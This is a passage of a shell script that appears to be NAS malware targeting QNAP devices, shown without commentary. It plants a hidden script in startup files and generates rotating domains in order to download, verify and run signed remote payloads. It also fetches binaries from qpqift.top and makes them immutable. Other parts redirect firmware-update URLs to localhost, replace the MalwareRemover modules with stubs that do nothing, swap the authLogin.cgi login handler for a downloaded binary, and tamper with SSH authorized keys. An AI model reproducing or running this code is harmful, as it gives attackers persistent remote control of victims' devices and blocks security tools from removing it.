CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
domainexts='cf:0 tk:0 com:1 ml:0 de:0 rocks:0 mx:0 biz:0 net:1 cn:0 ga:0 gq:0 org:1 top:0 nl:0 men:0 ws:0 se:0 info:0 xyz:0 today:0 ru:0 ec:0 co:0 ee:0 rs:0 com.sv:0 com.cy:0 co.zw:0 kg:0 com.ge:0 tl:0 name:0 tw:0 lv:0 bs:0 li:0 ng:0 ae:0 bt:0 tv:0 pe:0 uz:0 me:0 gy:0 am:0 kr:0 by:0 fr:0 com.uy:0 com.lb:0 com.br:0 vu:0 hk:0 in:0 re:0 ch:0 af:0 com.ps:0 ug:0 dz:0 pro:0 co.th:0 sg:0 cd:0 so:0 mo:0 co.id:0 co.il:0 com.do:0 ke:0 cx:0 ro:0 id:0 pm:0 hm:0 vg:0 az:0 com.eg:0 bz:0 su:0 com.ar:0 gg:0 com.lr:0 pa:0 com.ve:0 al:0 fm:0 to:0 mu:0 co.ck:0 pk:0 co.rs:0 cw:0 nr:0 gd:0 gl:0 ac:0 lk:0 md:0 fi:0 sx:0 lc:0 es:0 cc:0 cm:0 la:0 co.za:0 je:0 cz:0 jp:0 ai:0 pw:0 bg:0 nu:0 ag:0 bm:0 eu:0 com.my:0 sc:0 ax:0 wf:0 ly:0 qa:0 vn:0 aq:0 mobi:0 com.tr:0 com.ua:0 com.py:0 hk.org:0 south.am:0 com.kh:0 co.zm:0 ru.net:0 com.km:0 tt:0 kn:0 co.ls:0 co.fk:0 uy.com:0 com.gu:0 .com.bn:0 com.pf:0 com.fj:0'
|
||||
n=0
|
||||
|
||||
for ext in $domainexts; do
|
||||
eval 'domainext'"$n"'=$ext'
|
||||
n=$(( $n + 1 ))
|
||||
done
|
||||
domainextcnt=$n
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
XEOF
|
||||
cat >>".backup_${file}" <<EOF
|
||||
test -d "\${bdir}/.qpkg/${dir}" || mkdir "\${bdir}/.qpkg/${dir}"
|
||||
cd "\${bdir}/.qpkg/${dir}" && rm -f .tmp.*
|
||||
EOF
|
||||
cat >>".backup_${file}" <<"XEOF"
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
|
||||
for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
|
||||
tmpfile=$(mktemp "./.tmp.XXXXXX")
|
||||
test -f "$tmpfile" && outfile=$tmpfile && break
|
||||
done
|
||||
test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
|
||||
curlconntimeout=12
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
for interval in '1296000' '432000' '86400' '28800' '7200' '3600'; do
|
||||
timestart=$(date +%s)
|
||||
for length in 5 3 4; do
|
||||
timenow=$(date +%s)
|
||||
test "$(( $timenow - $timestart ))" -gt 600 && test "$interval" != "3600" && break
|
||||
curlconntimeout=$(( $curlconntimeout - ( $timenow - $timestart ) / 250 ))
|
||||
test "$curlconntimeout" -lt 6 && curlconntimeout=6
|
||||
n=0; while [ "$n" -lt $domainextcnt ]; do
|
||||
eval 'ext=$domainext'"$n"
|
||||
l=$(( $length + ${ext#*:} ))
|
||||
ext=${ext%:*}
|
||||
if [ $length = 5 ]; then
|
||||
hostname=$(echo "$(( $(date +%s) / $interval ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%${hostname#??????}}
|
||||
eval 'hostname'"$n"'=$hostname'
|
||||
fi
|
||||
eval 'host=$hostname'"$n"
|
||||
n=$(( $n + 1 ))
|
||||
trycnt=0
|
||||
while [ ${#host} -gt "$l" ] && [ $trycnt -lt 3 ]; do
|
||||
trycnt=$(( $trycnt + 1 ))
|
||||
host=${host%?}
|
||||
done
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout "$curlconntimeout" -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout "$curlconntimeout" -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout "$curlconntimeout" -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "${recentupdate:-0}" -eq 1 && exit 0
|
||||
for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
|
||||
tmpfile=$(mktemp "./.tmp.XXXXXX")
|
||||
test -f "$tmpfile" && outfile=$tmpfile && break
|
||||
done
|
||||
test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
chmod 755 ".backup_${file}"
|
||||
if grep "\.backup_${file}" "$file"; then
|
||||
:
|
||||
else
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
echo ". ./.backup_${file}" >> "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
|
||||
fi
|
||||
|
||||
if [ ! -f ".qdisk_cmd" ]; then
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
|
||||
test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
|
||||
else
|
||||
rm -f '.qdisk_cmd.tmp'
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
binhash=''; rsynchash=''
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
if [ -f "${path#*/}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${path#*/}"
|
||||
elif [ -f "${bdir}/.qpkg/${path}" ]; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "${bdir}/.qpkg/${path}"
|
||||
fi
|
||||
done
|
||||
|
||||
version=$(getcfg System Version)
|
||||
test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
|
||||
test "${version##*.}" -lt 3 || test "${version%%.*}" -lt 4 || test "$(version=${version#*.}; echo "${version%.*}")" -lt 3 && version=4.3.3 || { test "${version##*.}" -gt 5 && version=4.3.5; }
|
||||
|
||||
if [ ! -d rssdoc ]; then
|
||||
command -v bunzip2 && compext=bz2 || compext=gz
|
||||
curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" && test -f "rssdoc.tar.${compext}" && rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)" && { test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA="; } && { test "$compext" = bz2 && tarflag=j || tarflag=z; } && tar -x${tarflag}f "rssdoc.tar.${compext}" || rm -f rssdoc.tar
|
||||
rm -f "rssdoc.tar.${compext}"
|
||||
fi
|
||||
|
||||
rm -f /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
|
||||
ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
|
||||
|
||||
if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
|
||||
internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
|
||||
localupdateurl="http://127.0.0.1:${internalwebport}"
|
||||
sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
|
||||
fi
|
||||
|
||||
test -f '/etc/config/rssdoc/qpkgcenter_*.xml' || test -h '/etc/config/rssdoc/qpkgcenter_*.xml' && { test -f '.qdisk_cmd' && ./.qdisk_cmd -i '/etc/config/rssdoc/qpkgcenter_*.xml'; rm -f '/etc/config/rssdoc/qpkgcenter_*.xml'; }
|
||||
|
||||
if find /etc/config/rssdoc | grep 'qpkgcenter_.*\.xml'; then
|
||||
:
|
||||
else
|
||||
cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
|
||||
fi
|
||||
|
||||
for file in /etc/config/rssdoc/qpkgcenter_*.xml
|
||||
do
|
||||
if [ -f "$file" ] && { rm -f "$file" || [ ! -s "$file" ]; }; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
touch "$file"
|
||||
cp -f "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
|
||||
test -d "$qpkgdir" && break
|
||||
done
|
||||
test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
|
||||
test -d "${qpkgdir}/MalwareRemover/modules" || mkdir "${qpkgdir}/MalwareRemover/modules"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover"
|
||||
|
||||
if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
|
||||
for file in 10_derek_3.pyc 12_derek_3.pyc; do
|
||||
if [ ! -f "${qpkgdir}/MalwareRemover/modules/${file}" ] || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" || test -x "${qpkgdir}/MalwareRemover/modules/${file}" || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -gt 150 ] || [ $(wc -c < "${qpkgdir}/MalwareRemover/modules/${file}") -lt 120 ]; then
|
||||
test -f '.qdisk_cmd' && test -f "${qpkgdir}/MalwareRemover/modules/${file}" && ./.qdisk_cmd -i "${qpkgdir}/MalwareRemover/modules/${file}" && rm -f "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
openssl base64 -d <<"EOF" >"${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
A/MNCuVwTVxjAAAAAAAAAAABAAAAQAAAAHMLAAAAZQAAgwAAAWQAAFMoAQAAAE4o
|
||||
AQAAAHQEAAAAZXhpdCgAAAAAKAAAAAAoAAAAAHMVAAAAbW9kdWxlcy8xMF9kZXJl
|
||||
a18zLnB5dAgAAAA8bW9kdWxlPgEAAABzAAAAAA==
|
||||
EOF
|
||||
chmod -x "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
file=''; qpkgdir=''
|
||||
|
||||
if [ ! -f .rsakey ]; then
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
fi
|
||||
|
||||
cgibindir='/home/httpd/cgi-bin'
|
||||
if [ ! -f "1551848401_c" ] && [ -f "${cgibindir}/authLogin.cgi" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ]; then
|
||||
test -f "1551848401_c" || touch "1551848401_c"
|
||||
case "$(uname -m)" in
|
||||
*x86_64*)
|
||||
arch=x86_64
|
||||
binhash='rrYwg0D4+4DxcDxYQsNTB4JUGlQ='
|
||||
;;
|
||||
*arm*|*aarch*)
|
||||
arch=arm
|
||||
binhash='Z4n2BZdhwjYf0wjM7GCW61WM9eU='
|
||||
;;
|
||||
*i*86*)
|
||||
arch=i486
|
||||
binhash='U3eHe6syQraRBGgsvkFZH3wibDw='
|
||||
;;
|
||||
esac
|
||||
|
||||
if [ "x${binhash}" != 'x' ]; then
|
||||
curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal2_${arch}" || rm -f ".qal"
|
||||
test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
|
||||
if [ "x${rsynchash}" = "x${binhash}" ]; then
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod 755 "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
test -f '.qal' && rm -f '.qal'
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ -f "${cgibindir}"/authLogin.cgi ] && "${cgibindir}"/authLogin.cgi | grep '<QDocRoot'; then
|
||||
:
|
||||
else
|
||||
test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
|
||||
fi
|
||||
|
||||
test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
|
||||
if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
|
||||
sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
|
||||
lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
|
||||
sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
|
||||
kill -2 "$sshpid"
|
||||
fi
|
||||
|
||||
if [ ! -f '1548997200_c' ]; then
|
||||
touch '1548997200_c'
|
||||
mdir=`mktemp -d /tmp/.mount.XXXXXX` || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; } || mdir=`mktemp -d "${bdir}/.mount.XXXXXX"` || { mdir="${bdir}/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/mnt/HDA_ROOT/.mount.XXXXXX"` || { mdir="/mnt/HDA_ROOT/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "/.mount.XXXXXX"` || { mdir="/.mount.jbbxQob"; mkdir ${mdir}; } || `mktemp -d "./.mount.XXXXXX"` || { mdir="./.mount.jbbxQob"; mkdir ${mdir}; }
|
||||
__BOOT_DEV=
|
||||
__model=`getcfg System "Internal Model"`
|
||||
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
|
||||
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
|
||||
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
|
||||
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
|
||||
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
|
||||
